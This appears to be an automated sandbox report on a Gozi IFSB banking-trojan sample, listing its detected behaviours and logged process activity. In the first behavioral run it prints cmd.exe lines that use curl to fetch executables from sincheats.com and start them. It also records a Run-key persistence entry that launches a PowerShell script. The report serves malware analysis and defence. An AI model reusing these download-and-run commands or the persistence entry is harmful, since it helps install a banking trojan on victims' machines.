Malware Analysis Report

2025-08-05 13:07

Sample ID 220322-lnvc6aehb5
Target 98b082b4d65dfe4ee5b227575d1c08ef.png
SHA256 e7767ba8bcff3242dd32f880cb59894c3ce5615a2557504db976803cd246354e
Tags
gozi_ifsb 3000 banker evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e7767ba8bcff3242dd32f880cb59894c3ce5615a2557504db976803cd246354e

Threat Level: Known bad

The file 98b082b4d65dfe4ee5b227575d1c08ef.png was found to be: Known bad.

Malicious Activity Summary

gozi_ifsb 3000 banker evasion persistence trojan

UAC bypass

Gozi, Gozi IFSB

Modifies Windows Firewall

Downloads MZ/PE file

Executes dropped EXE

Checks computer location settings

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of FindShellTrayWindow

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Discovers systems in the same network

Gathers system information

Suspicious behavior: GetForegroundWindowSpam

Runs net.exe

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

System policy modification

Suspicious use of SendNotifyMessage

Enumerates processes with tasklist

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-22 09:41

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-22 09:41

Reported

2022-03-22 09:46

Platform

win7-20220310-en

Max time kernel

4294183s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe"

Signatures

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1604 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 1660 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe
PID 1604 wrote to memory of 1132 N/A C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe

"C:\Users\Admin\AppData\Local\Temp\98b082b4d65dfe4ee5b227575d1c08ef.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c mkdir C:\Users\Admin\AppData\Roaming\EdgeData

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.dll --output C:\Users\Admin\AppData\Roaming\EdgeData\A.dll

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c curl http://sincheats.com/gas/12/HF.exe.manifest --output C:\Users\Admin\AppData\Roaming\EdgeData\A.exe.manifest

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\EdgeData\A.exe

Network

N/A

Files

memory/1132-54-0x00000000753C1000-0x00000000753C3000-memory.dmp

memory/1132-65-0x0000000000460000-0x0000000000461000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-22 09:41

Reported

2022-03-22 09:46

Platform

win10v2004-20220310-en

Max time kernel

151s

Max time network

154s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

UAC bypass

evasion trojan

Downloads MZ/PE file

Modifies Windows Firewall

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\EdgeData\A.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Windows\System32\mshta.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FileOptions = "cmd /c start C:\\Users\\Admin\\FileOptions.lnk -ep unrestricted -file C:\\Users\\Admin\\DiagramClass.ps1" C:\Windows\Explorer.EXE N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1768 set thread context of 620 N/A C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe
PID 4616 set thread context of 1048 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 1048 set thread context of 5004 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 1048 set thread context of 3440 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1048 set thread context of 3740 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 5004 set thread context of 2144 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1048 set thread context of 3428 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 1048 set thread context of 392 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Roaming\EdgeData\A.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Roaming\EdgeData\A.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD C:\Users\Admin\AppData\Roaming\EdgeData\A.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Roaming\EdgeData\A.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Roaming\EdgeData\A.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\RuntimeBroker.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\EdgeData\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\AutoIt3.exe N/A
